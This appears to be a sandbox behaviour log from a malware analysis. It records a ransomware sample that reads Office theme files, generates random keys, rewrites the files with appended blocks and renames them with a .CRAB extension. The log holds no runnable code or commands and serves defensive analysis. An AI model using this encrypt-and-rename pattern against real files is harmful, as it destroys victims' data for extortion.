| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx, size = 1048576, size_out = 562113 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx, size = 562128 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx, size = 1048576, size_out = 601009 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx, size = 601024 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx, size = 1048576, size_out = 558035 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx, size = 558048 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx, size = 1048576, size_out = 570901 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx, size = 570912 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx, size = 1048576, size_out = 523048 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx, size = 523056 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, size = 1048576, size_out = 980900 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, size = 980912 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx, size = 1048576, size_out = 777647 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx, size = 777648 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx, size = 1048576, size_out = 924687 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx, size = 924688 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx, size = 1048576, size_out = 966946 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx, size = 966960 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx, size = 1048576, size_out = 155473 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx, size = 155488 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx, size = 1048576, size_out = 486596 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx, size = 486608 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx, size = 1048576, size_out = 976001 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx, size = 976016 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx, size = 1048576, size_out = 415058 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx, size = 415072 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx, size = 16 |
|
1 | |
